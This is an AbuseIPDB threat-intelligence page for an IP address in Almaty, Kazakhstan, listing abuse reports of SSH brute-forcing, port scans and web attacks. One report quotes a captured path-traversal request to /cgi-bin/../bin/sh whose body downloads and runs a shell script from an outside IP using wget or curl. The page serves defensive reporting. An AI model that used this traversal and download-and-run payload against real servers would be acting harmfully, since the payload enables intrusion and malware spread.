JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 194.32.142.49

194.32.142.49 was found in our database!

This IP was reported 156 times. Confidence of Abuse is 0%: ?

ISP	PS Internet Company LLP
Usage Type	Data Center/Web Hosting/Transit
ASN	AS48716
Domain Name	ps.kz
Country	🇰🇿 Kazakhstan
City	Almaty, Almaty

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 194.32.142.49

Whois 194.32.142.49

IP Abuse Reports for 194.32.142.49:

This IP address has been reported a total of 156 times from 103 distinct sources. 194.32.142.49 was first reported on November 19th 2025, and the most recent report was 6 months ago.

Old Reports: The most recent abuse report for this IP address is from 6 months ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
Anonymous	2025-12-12 14:32:22 (6 months ago)	Knocking on port 22 (endlessh)	SSH
Anonymous	2025-12-12 11:55:32 (6 months ago)	[11/Dec/2025:07:26:51 -0500] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh ... show more [11/Dec/2025:07:26:51 -0500] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" "libredtail-http" show less	Hacking
🇨🇳 ThreatBook.io	2025-12-12 00:34:05 (6 months ago)	ThreatBook Intelligence: Zombie,Spam more details on https://threatbook.io/ip/194.32.142.49 2025-12- ... show more ThreatBook Intelligence: Zombie,Spam more details on https://threatbook.io/ip/194.32.142.49 2025-12-11 10:17:52 /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh,{"body":"wget -qO- http://178.16.55.224/sh \|\| curl -s http://178.16.55.224/sh \| sh -s apache.selfrep","content_type":"text/plain","header":{"Accept":["/"],"Connection":["keep-alive"],"Content-Length":["91"],"Content-Type":["text/plain"],"Upgrade-Insecure-Requests":["1"],"User-Agent":["libredtail-http"]},"host":"47.83.181.112:80","method":"POST","proto":"HTTP/1.1","remote_addr":"194.32.142.49:53474","status_code":200,"url":"/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh","user_agent":"libredtail-http"} show less	SSH
🇹🇷 rtbh.com.tr	2025-12-11 20:10:24 (6 months ago)	list.rtbh.com.tr report: tcp/0	Brute-Force
Anonymous	2025-12-11 12:24:23 (6 months ago)	2025-12-11T12:20:11.194077+00:00 lg sshd[732560]: Invalid user admin from 194.32.142.49 port 60436 2 ... show more 2025-12-11T12:20:11.194077+00:00 lg sshd[732560]: Invalid user admin from 194.32.142.49 port 60436 2025-12-11T12:20:43.331226+00:00 lg sshd[732562]: Invalid user orangepi from 194.32.142.49 port 57256 2025-12-11T12:24:22.612350+00:00 lg sshd[732609]: Invalid user test from 194.32.142.49 port 55678 ... show less	Brute-Force SSH
🇺🇸 jkhorvath.com	2025-12-11 11:39:43 (6 months ago)	Request for URL /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh	Phishing Brute-Force Web App Attack
🇬🇧 billy549	2025-12-11 11:36:00 (6 months ago)	2025-12-11T11:29:50.423908+00:00 ubuntu-hpe-gen8 sshd[145982]: Invalid user admin from 194.32.142.49 ... show more 2025-12-11T11:29:50.423908+00:00 ubuntu-hpe-gen8 sshd[145982]: Invalid user admin from 194.32.142.49 port 55882 2025-12-11T11:30:23.245218+00:00 ubuntu-hpe-gen8 sshd[146286]: Invalid user orangepi from 194.32.142.49 port 44718 2025-12-11T11:34:17.811956+00:00 ubuntu-hpe-gen8 sshd[149010]: Invalid user test from 194.32.142.49 port 43170 2025-12-11T11:34:51.981703+00:00 ubuntu-hpe-gen8 sshd[149325]: Invalid user user from 194.32.142.49 port 58806 2025-12-11T11:36:00.068487+00:00 ubuntu-hpe-gen8 sshd[149990]: Invalid user admin from 194.32.142.49 port 45720 ... show less	Brute-Force SSH
🇫🇮 Voluna	2025-12-11 11:29:08 (6 months ago)	2025-12-11T11:29:06.382755+00:00 MailServer-Slave sshd[118576]: pam_unix(sshd:auth): authentication ... show more 2025-12-11T11:29:06.382755+00:00 MailServer-Slave sshd[118576]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=194.32.142.49 2025-12-11T11:29:07.974082+00:00 MailServer-Slave sshd[118576]: Failed password for invalid user admin from 194.32.142.49 port 58514 ssh2 ... show less	Brute-Force SSH
🇩🇪 david1117	2025-12-11 11:20:40 (6 months ago)	Dec 11 11:14:47 web sshd[1602277]: Invalid user admin from 194.32.142.49 port 40828 Dec 11 11:15:21 ... show more Dec 11 11:14:47 web sshd[1602277]: Invalid user admin from 194.32.142.49 port 40828 Dec 11 11:15:21 web sshd[1602461]: Invalid user orangepi from 194.32.142.49 port 47312 Dec 11 11:19:03 web sshd[1603690]: Invalid user test from 194.32.142.49 port 42366 Dec 11 11:19:35 web sshd[1603868]: Invalid user user from 194.32.142.49 port 34106 Dec 11 11:20:39 web sshd[1604204]: Invalid user admin from 194.32.142.49 port 49904 ... show less	Brute-Force SSH
🇩🇪 formality	2025-12-11 07:46:42 (6 months ago)	Invalid user ansible from 194.32.142.49 port 46260	Brute-Force SSH
🇫🇷 mouafiq	2025-12-11 06:05:42 (6 months ago)	Dec 11 07:04:45 vps789833 sshd[23323]: pam_unix(sshd:auth): authentication failure; logname= uid=0 e ... show more Dec 11 07:04:45 vps789833 sshd[23323]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=194.32.142.49 Dec 11 07:04:48 vps789833 sshd[23323]: Failed password for invalid user admin from 194.32.142.49 port 38776 ssh2 Dec 11 07:05:41 vps789833 sshd[23338]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=194.32.142.49 show less	Brute-Force SSH
🇩🇪 formality	2025-12-11 06:05:42 (6 months ago)	Invalid user admin from 194.32.142.49 port 58362	Brute-Force SSH
🇩🇪 Filli Group	2025-12-11 05:49:08 (6 months ago)	2025-12-11T06:48:01.852416mx02.crazycraftland.net sshd[1936084]: Invalid user admin from 194.32.142. ... show more 2025-12-11T06:48:01.852416mx02.crazycraftland.net sshd[1936084]: Invalid user admin from 194.32.142.49 port 42286 2025-12-11T06:48:36.522947mx02.crazycraftland.net sshd[1936091]: Invalid user orangepi from 194.32.142.49 port 36082 2025-12-11T06:49:07.492952mx02.crazycraftland.net sshd[1936106]: User root from 194.32.142.49 not allowed because not listed in AllowUsers ... show less	Brute-Force SSH
🇺🇸 technash	2025-12-11 04:22:38 (6 months ago)	Web app attack detection [ModSecurity]. Result: Dropped traffic.	Web App Attack
🇦🇹 urnilxfgbez	2025-12-10 23:45:00 (6 months ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan

Showing 1 to 15 of 156 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 40.124.175.75

🇺🇸 2604:a880:400:d1:0:4:9e90:d001

🇹🇼 198.235.24.64

🇺🇸 147.185.132.246

🇦🇺 123.209.113.16

🇰🇷 106.243.220.156

🇰🇷 59.24.133.197

🇸🇰 37.120.221.70

🇺🇸 3.84.206.113

🇷🇴 2.57.122.238

🇺🇸 216.25.89.131

🇳🇱 204.76.203.231

🇧🇷 152.32.197.159

🇨🇳 106.124.147.169

🇮🇶 65.20.143.45

🇳🇱 45.142.193.169

🇺🇸 34.162.183.7

🇦🇪 2.50.158.55

🇺🇸 216.180.246.71

🇮🇳 210.212.136.3